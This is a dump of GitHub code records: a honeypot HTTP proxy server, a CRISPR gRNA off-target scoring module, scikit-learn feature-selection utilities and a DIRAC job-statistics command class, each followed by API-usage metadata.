"foolbox.attacks.base.call_decorator", "line_number": 494, "usage_type": "name"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 564, "usage_type": "name"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 654, "usage_type": "name"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 735, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 818, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 818, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 825, "usage_type": "call"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 836, "usage_type": "name"}]} +{"seq_id": "15579456485", "text": "\"\"\"\n// -------------------------------------------------------------\n// author Giga\n// project qeeqbox/honeypots\n// email gigaqeeq@gmail.com\n// description app.py (CLI)\n// licensee AGPL-3.0\n// -------------------------------------------------------------\n// contributors list qeeqbox/social-analyzer/graphs/contributors\n// -------------------------------------------------------------\n\"\"\"\n\nfrom uuid import uuid4\nfrom honeypots.helper import close_port_wrapper, get_free_port, kill_server_wrapper, server_arguments, setup_logger, disable_logger\nfrom os import path\nfrom email.parser import BytesParser\nfrom subprocess import Popen\nfrom requests import get\nfrom twisted.python import log as tlog\nfrom twisted.internet.protocol import Protocol, ClientFactory, Factory\nfrom twisted.internet import reactor\nfrom dns.resolver import query as dsnquery\nfrom warnings import filterwarnings\nfilterwarnings(action='ignore', module='.*OpenSSL.*')\n\n\nclass QHTTPProxyServer():\n def __init__(self, ip=None, port=None, mocking=None, config=''):\n self.ip = ip or '0.0.0.0'\n self.port = port or 8080\n self.mocking = mocking or ''\n self.process = None\n self.uuid = 'honeypotslogger'\n self.config = config\n if config:\n self.logs = setup_logger(self.uuid, config)\n else:\n self.logs = setup_logger(self.uuid, None)\n disable_logger(1, tlog)\n\n def http_proxy_server_main(self):\n _q_s = self\n\n class CustomProtocolParent(Protocol):\n\n def __init__(self):\n self.buffer = None\n self.client = None\n\n def resolve_domain(self, request_string):\n try:\n _, parsed_request = request_string.split(b'\\r\\n', 1)\n headers = BytesParser().parsebytes(parsed_request)\n host = headers[\"host\"].split(\":\")\n _q_s.logs.info({'server': 'http_proxy_server', 'action': 'query', 'ip': self.transport.getPeer(\n ).host, 'port': self.transport.getPeer().port, 'payload': host[0]})\n # return \"127.0.0.1\"\n return dsnquery(host[0], 'A')[0].address\n except Exception as e:\n _q_s.logs.error([\"errors\", {\n 'server': 'http_proxy_server', 'error': 'resolve_domain', \"type\": \"error -> \" + repr(e)}])\n return None\n\n def dataReceived(self, data):\n _q_s.logs.info({'server': 'http_proxy_server', 'action': 'connection',\n 'ip': self.transport.getPeer().host, 'port': self.transport.getPeer().port})\n try:\n ip = self.resolve_domain(data)\n if ip:\n factory = ClientFactory()\n factory.CustomProtocolParent_ = self\n factory.protocol = CustomProtocolChild\n reactor.connectTCP(ip, 80, factory)\n else:\n self.transport.loseConnection()\n\n if self.client:\n self.client.write(data)\n else:\n self.buffer = data\n except BaseException:\n pass\n\n def write(self, data):\n self.transport.write(data)\n\n class CustomProtocolChild(Protocol):\n def connectionMade(self):\n self.write(self.factory.CustomProtocolParent_.buffer)\n\n def dataReceived(self, data):\n self.factory.CustomProtocolParent_.write(data)\n\n def write(self, data):\n self.transport.write(data)\n\n factory = Factory()\n factory.protocol = CustomProtocolParent\n reactor.listenTCP(port=self.port, factory=factory, interface=self.ip)\n reactor.run()\n\n def run_server(self, process=False, auto=False):\n if process:\n if auto:\n port = get_free_port()\n if port > 0:\n self.port = port\n self.process = Popen(['python3', path.realpath(__file__), '--custom', '--ip', str(self.ip), '--port', str(\n self.port), '--mocking', str(self.mocking), '--config', str(self.config), '--uuid', str(self.uuid)])\n if self.process.poll() is None:\n self.logs.info({'server': 'http_proxy_server', 'action': 'process',\n 'status': 'success', 'ip': self.ip, 'port': self.port})\n else:\n self.logs.info({'server': 'http_proxy_server', 'action': 'process',\n 'status': 'error', 'ip': self.ip, 'port': self.port})\n else:\n self.logs.info({'server': 'http_proxy_server', 'action': 'setup',\n 'status': 'error', 'ip': self.ip, 'port': self.port})\n elif self.close_port() and self.kill_server():\n self.process = Popen(['python3', path.realpath(__file__), '--custom', '--ip', str(self.ip), '--port', str(\n self.port), '--mocking', str(self.mocking), '--config', str(self.config), '--uuid', str(self.uuid)])\n if self.process.poll() is None:\n self.logs.info({'server': 'http_proxy_server', 'action': 'process',\n 'status': 'success', 'ip': self.ip, 'port': self.port})\n else:\n self.logs.info({'server': 'http_proxy_server', 'action': 'process',\n 'status': 'error', 'ip': self.ip, 'port': self.port})\n else:\n self.http_proxy_server_main()\n\n def test_server(self, ip=None, port=None, domain=None):\n try:\n _ip = ip or self.ip\n _port = port or self.port\n _domain = domain or \"http://yahoo.com\"\n get(_domain, proxies={\n \"http\": 'http://{}:{}'.format(_ip, _port)}).text.encode('ascii', 'ignore')\n except BaseException:\n pass\n\n def close_port(self):\n ret = close_port_wrapper(\n 'http_proxy_server', self.ip, self.port, self.logs)\n return ret\n\n def kill_server(self):\n ret = kill_server_wrapper('http_proxy_server', self.uuid, self.process)\n return ret\n\n\nif __name__ == '__main__':\n parsed = server_arguments()\n if parsed.docker or parsed.aws or parsed.custom:\n qhttpproxyserver = QHTTPProxyServer(\n ip=parsed.ip, port=parsed.port, mocking=parsed.mocking, config=parsed.config)\n qhttpproxyserver.run_server()\n", "repo_name": "L3thal14/Pandora", "sub_path": "honeypots/http_proxy_server.py", "file_name": "http_proxy_server.py", "file_ext": "py", "file_size_in_byte": 6757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 24, "usage_type": "call"}, {"api_name": "honeypots.helper.setup_logger", "line_number": 36, "usage_type": "call"}, {"api_name": "honeypots.helper.setup_logger", "line_number": 38, "usage_type": "call"}, {"api_name": "honeypots.helper.disable_logger", "line_number": 39, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 39, "usage_type": "argument"}, {"api_name": "twisted.internet.protocol.Protocol", "line_number": 44, "usage_type": "name"}, {"api_name": "email.parser.BytesParser", "line_number": 53, "usage_type": "call"}, {"api_name": "dns.resolver.query", "line_number": 58, "usage_type": "call"}, {"api_name": "twisted.internet.protocol.ClientFactory", "line_number": 70, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.connectTCP", "line_number": 73, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 73, "usage_type": "name"}, {"api_name": "twisted.internet.protocol.Protocol", "line_number": 87, "usage_type": "name"}, {"api_name": "twisted.internet.protocol.Factory", "line_number": 97, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.listenTCP", "line_number": 99, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 99, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.run", "line_number": 100, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 100, "usage_type": "name"}, {"api_name": "honeypots.helper.get_free_port", "line_number": 105, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 136, "usage_type": "call"}, {"api_name": "honeypots.helper.close_port_wrapper", "line_number": 142, "usage_type": "call"}, {"api_name": "honeypots.helper.kill_server_wrapper", "line_number": 147, "usage_type": "call"}, {"api_name": "honeypots.helper.server_arguments", "line_number": 152, "usage_type": "call"}]} +{"seq_id": "41405702640", "text": "# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n# Author: Yixin Guo, Ziwei Xue\n#\n# ------------------------- #\n# Python Modules\n# ------------------------- #\n\nimport numpy as np\nimport sys\nfrom functools import partial\nfrom collections import Counter\n\n# ------------------------- #\n# Package Python Modules\n# ------------------------- #\n\nfrom .dbutils import *\nfrom .grna_query import *\n\noff_target_penalty = {\"diffTE\":.06, \"sameTE\":.03, 'exon':.09, 'intron':.09, 'promoter-TSS':.09, \"intergenic\": .0,}\nmm_penalty = {'0': .004, '3': .001, '2':.002, '1':.003}\n\ndef map_annotation(te1, te2, x):\n anno = x[0].split('(')[0]\n if te2:\n if anno == \"TE\":\n if x[2] == te2:\n return (0,\"sameTEdup\",x[0].split('(')[1].split(';')[0])\n anno = x[1]\n if anno == te1:\n return (off_target_penalty[\"sameTE\"], \"sameTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[\"diffTE\"], \"diffTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[anno], anno, anno)\n else:\n if anno == \"TE\":\n if anno == te1:\n return (off_target_penalty[\"sameTE\"], \"sameTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[\"diffTE\"], \"diffTE\", x[0].split('(')[1].split(';')[0])\n else:\n return (off_target_penalty[anno], anno, anno)\n\n\ndef calculate_offtarget_score(gids_mms, self_te_class, self_te_dup=None):\n result = {}\n par_func = partial(map_annotation, self_te_class, self_te_dup)\n for gid, mm in gids_mms.items():\n score = 0\n result[gid] = {}\n result[gid][\"mm0\"], result[gid][\"mm1\"], result[gid][\"mm2\"], result[gid][\"mm3\"] = {},{},{},{}\n result[gid][\"mm0\"][\"brief\"], result[gid][\"mm1\"][\"brief\"], result[gid][\"mm2\"][\"brief\"], result[gid][\"mm3\"][\"brief\"] = [],[],[],[]\n result[gid][\"mm0\"][\"detail\"], result[gid][\"mm1\"][\"detail\"], result[gid][\"mm2\"][\"detail\"], result[gid][\"mm3\"][\"detail\"] = [],[],[],[]\n\n for i in [\"mm0\", \"mm1\", \"mm2\", \"mm3\"]:\n annotation = list(map(lambda x:(x[1],x[2],x[3]), mm[i]))\n annotation = list(map(par_func, annotation))\n score += sum(list(map(lambda x:x[0], annotation))) * mm_penalty['0']\n result[gid][i][\"brief\"] = list(map(lambda x:x[1], annotation))\n result[gid][i][\"detail\"] = list(map(lambda x:x[2], annotation))\n\n result[gid][i][\"brief\"] = dict(Counter(result[gid][i][\"brief\"]))\n result[gid][i][\"detail\"] = dict(Counter(result[gid][i][\"detail\"]))\n\n\n gids_mms[gid][i] = {}\n\n gids_mms[gid][i][\"class\"] = result[gid][i][\"brief\"]\n gids_mms[gid][i][\"raw\"] = result[gid][i][\"detail\"]\n\n gids_mms[gid][\"score\"] = gids_mms[gid][\"gscore\"] -score\n \n return gids_mms\n", "repo_name": "WanluLiuLab/CRISPRTE", "sub_path": "src/grna_mismatch_scoring.py", "file_name": "grna_mismatch_scoring.py", "file_ext": "py", "file_size_in_byte": 2889, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "functools.partial", "line_number": 49, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 64, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "17344400284", "text": "from sklearn.feature_selection import VarianceThreshold\nfrom sklearn.feature_selection import chi2\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.feature_selection import f_regression\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_selection import mutual_info_regression\nimport heapq\nfrom scipy.stats import pearsonr\nfrom scipy.stats import spearmanr\nfrom sklearn.model_selection import KFold\nfrom sklearn.feature_selection import RFE\nfrom sklearn.feature_selection import RFECV\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingClassifier, GradientBoostingRegressor\n\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.linear_model import Lasso\n\n\ndef variance_threshold(X, threshold, get_feature_importance=False):\n '''\n 方差选择\n 使用方差选择法,先要计算各个特征的方差,然后根据阈值,选择方差大于阈值的特征。\n 只需修改参数threshold, 将筛选出方差大于threshold的变量。\n 这个方法的特征权重用方差大小表示,可以认为方差越大,特征越好\n '''\n model = VarianceThreshold(threshold)\n model.fit(X)\n features = X.columns[model.get_support().tolist()]\n if not get_feature_importance:\n return features\n else:\n variance = model.variances_\n return features, variance\n\n\ndef chi_square(X, y, k, get_feature_importance=False):\n '''\n 卡方选择,用于分类任务\n 根据特征与目标的独立性选择特征\n 只需修改参数k, 表示保留的变量个数\n 这个方法的特征权重用卡方值表示,可以认为卡方值越大,特征越好\n '''\n model = SelectKBest(chi2, k)\n model.fit(X, y)\n features = X.columns[model.get_support().tolist()]\n if not get_feature_importance:\n return features\n else:\n chi2_value = model.scores_\n return features, chi2_value\n\n\ndef f_stat(X, y, k, task_type=\"clf\", get_feature_importance=False):\n '''\n F检验(ANOVA选择),\n 参数k, 表示保留的变量个数\n 参数task_type,任务类型,可以选择分类(clf)和回归(reg)\n 这个方法的特征权重用F值表示,可以认为F值越大,特征越好\n '''\n if task_type == \"clf\":\n model = SelectKBest(f_classif, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n\n elif task_type == \"reg\":\n model = SelectKBest(f_regression, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n else:\n raise Exception(\"Unknown task type\")\n\n if not get_feature_importance:\n return selected_features\n else:\n f_value = model.scores_\n return selected_features, f_value\n\n\ndef mutual_info(X, y, k, task_type=\"clf\", get_feature_importance=False):\n '''\n 互信息法\n 参数k, 表示保留的变量个数\n 参数task_type,任务类型,可以选择分类(clf)和回归(reg)\n 这个方法的特征权重用互信息值表示,可以认为互信息值越大,特征越好\n '''\n if task_type == \"clf\":\n model = SelectKBest(mutual_info_classif, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n elif task_type == \"reg\":\n model = SelectKBest(mutual_info_regression, k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n else:\n raise Exception(\"Unknown task type\")\n\n if not get_feature_importance:\n return selected_features\n else:\n mi = model.scores_\n return selected_features, mi\n\n\ndef correlation(X, y, k, method=\"pearsonr\", get_feature_importance=False):\n '''\n 相关系数法\n 参数method,可以选择“pearsonr”或“spearmanr\"\n 参数k, 表示保留的变量个数\n 这个方法的特征权重用相关系数表示,可以认为相关系数越大,特征越好\n '''\n rs = []\n for i in range(X.shape[1]):\n if method==\"pearsonr\":\n r, p = pearsonr(X.iloc[:, i], y)\n elif method==\"spearmanr\":\n r, p = spearmanr(X.iloc[:, i], y)\n else:\n raise Exception(\"Unrecognized correlation method\")\n rs.append(r)\n ind = list(map(rs.index, heapq.nlargest(k, rs)))\n selected_features = X.columns[ind]\n if not get_feature_importance:\n return selected_features\n else:\n coefficients = rs[ind]\n return selected_features, coefficients\n\n\ndef rfe(X, y, k, mode=\"LR\", get_feature_importance=False):\n '''\n Wrapper法\n RFE\n 参数k,表示保留的变量个数\n 参数mode,wrapper方法中使用的模式,可选\n 1. \"LR\", 默认, logistic regression\n 2. \"SVC\", 线性核SVM\n 3. \"DT\", \"decision tree\"\n 4. \"DTR\", \"decision tree regressor\"\n 5. \"RF\", \"random forest\"\n 6. \"RFR\", \"random forest regressor\"\n 7. \"GB\", \"gradient boosting\"\n 8. \"GBR\", \"gradient boosting regressor\"\n 如果为回归任务,应选择DTR,RFR,GBR.各个estimator使用默认参数,要修改estimator的参数,请参考sklearn的官方文档\n '''\n if mode == \"LR\":\n estimator = LogisticRegression()\n elif mode == \"SVC\":\n estimator = SVC(kernel=\"linear\", C=1)\n elif mode == \"DT\":\n estimator = DecisionTreeClassifier()\n elif mode == \"RF\":\n estimator = RandomForestClassifier()\n elif mode == \"GB\":\n estimator = GradientBoostingClassifier()\n elif mode == \"DTR\":\n estimator = DecisionTreeRegressor()\n elif mode == \"RFR\":\n estimator = RandomForestRegressor()\n elif mode == \"GBR\":\n estimator = GradientBoostingRegressor()\n else:\n raise Exception(\"Unrecognized estimator\")\n\n model = RFE(estimator=estimator, n_features_to_select=k)\n model.fit(X, y)\n selected_features = X.columns[model.get_support().tolist()]\n if not get_feature_importance:\n return selected_features\n else:\n estimator = model.estimator_\n if mode in ['LR', 'SVC']:\n feature_importance = estimator.coef_\n elif mode in ['DT', 'DTR', 'RF', 'RFR', 'GB', 'GBR']:\n feature_importance = estimator.feature_importances_\n return selected_features, feature_importance\n\n\n\ndef rfecv(X, y, mode=\"LR\", n_splits=5, random_state=1, scoring=\"neg_mean_squared_error\"):\n '''\n Wrapper法\n RFECV\n 这个方法通过交叉验证自动返回最佳特征,不需要指定返回特征数量,但是消耗时间较长\n 参数mode,wrapper方法中使用的模式,可选\n 1. \"LR\", 默认, logistic regression\n 2. \"SVC\", 线性核SVM\n 3. \"DT\", \"decision tree\"\n 4. \"DTR\", \"decision tree regressor\"\n 5. \"RF\", \"random forest\"\n 6. \"RFR\", \"random forest regressor\"\n 7. \"GB\", \"gradient boosting\"\n 8. \"GBR\", \"gradient boosting regressor\"\n 如果为回归任务,应选择DTR,RFR,GBR.各个estimator使用默认参数,要修改estimator的参数,请参考sklearn的官方文档\n n_splits, 交叉验证次数\n random_state, 交叉验证切割数据的种子\n scoring, 交叉验证用的评估指标\n '''\n if mode == \"LR\":\n estimator = LogisticRegression()\n elif mode == \"SVC\":\n estimator = SVC(kernel=\"linear\", C=1)\n elif mode == \"DT\":\n estimator = DecisionTreeClassifier()\n elif mode == \"RF\":\n estimator = RandomForestClassifier()\n elif mode == \"GB\":\n estimator = GradientBoostingClassifier()\n elif mode == \"DTR\":\n estimator = DecisionTreeRegressor()\n elif mode == \"RFR\":\n estimator = RandomForestRegressor()\n elif mode == \"GBR\":\n estimator = GradientBoostingRegressor()\n else:\n raise Exception(\"Unrecognized estimator\")\n\n model = RFECV(estimator=estimator, cv=KFold(n_splits=n_splits, random_state=random_state), scoring=scoring)\n model.fit(X, y)\n return X.columns[model.get_support().tolist()]\n\n\ndef embedding(X, y, mode = \"LR\"):\n '''\n embedding法\n 通过训练模型自动选择最佳特征,不需要指定返回特征数量\n 参数mode,embedding方法中使用的模式,可选\n 1. \"LR\", 默认, logistic regression\n 2. \"Lasso\"\n 3. \"RF\", \"random forest\"\n 4. \"RFR\", \"random forest regressor\"\n 5. \"GB\", \"gradient boosting\"\n 6. \"GBR\", \"gradient boosting regressor\"\n 如果为回归任务,应选择Lasso, RFR, GBR.各个estimator使用默认参数,要修改estimator的参数,请参考sklearn的官方文档\n '''\n if mode == \"LR\":\n model = SelectFromModel(LogisticRegression())\n elif mode == \"GBR\":\n model = SelectFromModel(GradientBoostingRegressor())\n elif mode == \"GB\":\n model = SelectFromModel(GradientBoostingClassifier())\n elif mode == \"RFR\":\n model = SelectFromModel(RandomForestRegressor())\n elif mode == \"Lasso\":\n model = SelectFromModel(Lasso())\n elif mode == \"RF\":\n model = SelectFromModel(RandomForestClassifier())\n else:\n raise Exception(\"Unrecognized model\")\n model.fit(X, y)\n return X.columns[model.get_support().tolist()]\n\n\n\n", "repo_name": "nainai123/tools", "sub_path": "python/utils/feature_selection.py", "file_name": "feature_selection.py", "file_ext": "py", "file_size_in_byte": 9479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.feature_selection.VarianceThreshold", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.chi2", "line_number": 49, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.f_classif", "line_number": 67, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.f_regression", "line_number": 72, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.mutual_info_classif", "line_number": 93, "usage_type": "argument"}, {"api_name": "sklearn.feature_selection.SelectKBest", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.mutual_info_regression", "line_number": 97, "usage_type": "argument"}, {"api_name": "scipy.stats.pearsonr", "line_number": 120, "usage_type": "call"}, {"api_name": "scipy.stats.spearmanr", "line_number": 122, "usage_type": "call"}, {"api_name": "heapq.nlargest", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 166, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.RFE", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 207, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 209, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 211, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 215, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.RFECV", "line_number": 223, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 223, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 242, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 242, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 244, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 244, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 246, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 246, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 248, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 248, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.SelectFromModel", "line_number": 252, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 252, "usage_type": "call"}]} +{"seq_id": "19885901701", "text": "\"\"\" JobCommand\n \n The JobCommand class is a command class to know about present jobs efficiency\n \n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom DIRAC import S_OK, S_ERROR\nfrom DIRAC.ResourceStatusSystem.Command.Command import Command\nfrom DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import ResourceManagementClient\nfrom DIRAC.ResourceStatusSystem.Utilities import CSHelpers\nfrom DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB\n\n__RCSID__ = '$Id: $'\n\n\nclass JobCommand( Command ):\n \"\"\"\n Job \"master\" Command. \n \"\"\"\n\n def __init__( self, args = None, clients = None ):\n \n super( JobCommand, self ).__init__( args, clients )\n\n if 'JobDB' in self.apis:\n self.jobDB = self.apis[ 'JobDB' ]\n else:\n self.jobDB = JobDB()\n\n if 'ResourceManagementClient' in self.apis:\n self.rmClient = self.apis[ 'ResourceManagementClient' ]\n else:\n self.rmClient = ResourceManagementClient()\n\n\n def _storeCommand( self, result ):\n \"\"\"\n Stores the results of doNew method on the database.\n \"\"\"\n \n for jobDict in result:\n \n lowerCaseJobDict = {}\n for key, value in jobDict.iteritems():\n lowerCaseJobDict[ key[0].lower() + key[1:] ] = value\n \n resQuery = self.rmClient.addOrModifyJobCache( **lowerCaseJobDict )\n \n if not resQuery[ 'OK' ]:\n return resQuery\n \n return S_OK()\n\n \n def _prepareCommand( self ):\n \"\"\"\n JobCommand requires one arguments:\n - name : \n \"\"\"\n\n if not 'name' in self.args:\n return S_ERROR( '\"name\" not found in self.args' )\n name = self.args[ 'name' ]\n \n if not 'timespan' in self.args:\n return S_ERROR( '\"timespan\" not found in self.args' )\n timespan = self.args[ 'timespan' ]\n \n return S_OK( ( name, timespan ) )\n \n \n def doNew( self, masterParams = None ):\n \"\"\"\n Gets the parameters to run, either from the master method or from its\n own arguments.\n \n It contacts the WMSAdministrator with a list of site names, or a single \n site.\n \n If there are jobs, are recorded and then returned. \n \"\"\"\n \n if masterParams is True:\n self.args[ 'name' ] = ''\n\n params = self._prepareCommand()\n if not params[ 'OK' ]:\n return params\n\n name, timespan = params[ 'Value' ]\n \n condDict = {}\n if name:\n condDict = { 'Site' : name }\n\n startTimeWindow = datetime.utcnow() - timedelta( seconds = timespan )\n \n results = self.jobDB.getCounters( 'Jobs', ['Site', 'Status'],\n condDict, newer = startTimeWindow,\n timeStamp = 'LastUpdateTime' )\n \n if not results[ 'OK' ]:\n return results\n # Results look like this\n # [ ({'Status': 'Checking', 'Site': 'ANY'}, 6L), ...\n \n uniformResult = {}\n \n jobStatuses = ( 'Checking', 'Completed', 'Done', 'Failed', 'Killed', 'Matched',\n 'Received', 'Rescheduled', 'Running', 'Staging', 'Stalled',\n 'Waiting' )\n \n for resultTuple in results[ 'Value' ]:\n \n selectionDict, numberOfJobs = resultTuple\n \n siteName = selectionDict[ 'Site' ]\n \n if siteName in ( 'ANY', 'Multiple' ):\n continue\n \n if not siteName in uniformResult:\n uniformResult[ siteName ] = dict.fromkeys( jobStatuses, 0 )\n \n uniformResult[ siteName ][ selectionDict[ 'Status' ] ] = numberOfJobs\n\n # Store results\n storeRes = self._storeCommand( uniformResult )\n if not storeRes[ 'OK' ]:\n return storeRes\n \n return S_OK( uniformResult )\n \n \n def doCache( self ):\n \"\"\"\n Method that reads the cache table and tries to read from it. It will \n return a list of dictionaries if there are results.\n \"\"\"\n \n params = self._prepareCommand()\n if not params[ 'OK' ]:\n return params\n name = params[ 'Value' ]\n \n result = self.rmClient.selectJobCache( name )\n if result[ 'OK' ]:\n result = S_OK( [ dict( zip( result[ 'Columns' ], res ) ) for res in result[ 'Value' ] ] )\n \n return result\n \n \n def doMaster( self ):\n \"\"\"\n Master method.\n \n Gets all sites and calls doNew method.\n \"\"\"\n \n siteNames = CSHelpers.getSites() \n if not siteNames[ 'OK' ]:\n return siteNames\n siteNames = siteNames[ 'Value' ]\n \n jobsResults = self.doNew( siteNames )\n if not jobsResults[ 'OK' ]:\n self.metrics[ 'failed' ].append( jobsResults[ 'Message' ] )\n \n return S_OK( self.metrics ) \n \n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n\n#class JobsStatsCommand( Command ):\n# \n# def __init__( self, args = None, clients = None ):\n# \n# super( JobsStatsCommand, self ).__init__( args, clients )\n# \n# if 'JobsClient' in self.apis:\n# self.jClient = self.apis[ 'JobsClient' ]\n# else:\n# self.jClient = JobsClient() \n# \n# def doCommand( self ):\n# \"\"\" \n# Return getJobStats from Jobs Client \n# \n# :attr:`args`: \n# - args[0]: string: should be a ValidElement\n#\n# - args[1]: string: should be the name of the ValidElement\n#\n# returns:\n# {\n# 'MeanProcessedJobs': X\n# }\n# \"\"\"\n#\n# return self.jClient.getJobsStats( self.args[0], self.args[1], self.args[2] )\n \n################################################################################\n################################################################################\n\n#class JobsEffCommand( Command ):\n#\n# def __init__( self, args = None, clients = None ):\n# \n# super( JobsEffCommand, self ).__init__( args, clients )\n# \n# if 'JobsClient' in self.apis:\n# self.jClient = self.apis[ 'JobsClient' ]\n# else:\n# self.jClient = JobsClient() \n# \n# def doCommand( self ):\n# \"\"\" \n# Return getJobsEff from Jobs Client \n# \n# :attr:`args`: \n# - args[0]: string: should be a ValidElement\n# \n# - args[1]: string: should be the name of the ValidElement\n#\n# returns:\n# {\n# 'JobsEff': X\n# }\n# \"\"\"\n# \n# res = self.jClient.getJobsEff( self.args[0], self.args[1], self.args[2] )\n# \n# return S_OK( res ) \n\n################################################################################\n################################################################################\n\n#class SystemChargeCommand( Command ):\n# \n# def __init__( self, args = None, clients = None ):\n# \n# super( SystemChargeCommand, self ).__init__( args, clients )\n# \n# if 'JobsClient' in self.apis:\n# self.jClient = self.apis[ 'JobsClient' ]\n# else:\n# self.jClient = JobsClient() \n# \n# def doCommand(self):\n# \"\"\" Returns last hour system charge, and the system charge of an hour before\n#\n# returns:\n# {\n# 'LastHour': n_lastHour\n# 'anHourBefore': n_anHourBefore\n# }\n# \"\"\"\n# \n# \n# res = self.jClient.getSystemCharge()\n#\n# return S_OK( res ) \n \n################################################################################\n################################################################################\n\n#class JobsWMSCommand( Command ):\n# \n# def __init__( self, args = None, clients = None ):\n# \n# super( JobsWMSCommand, self ).__init__( args, clients )\n#\n# if 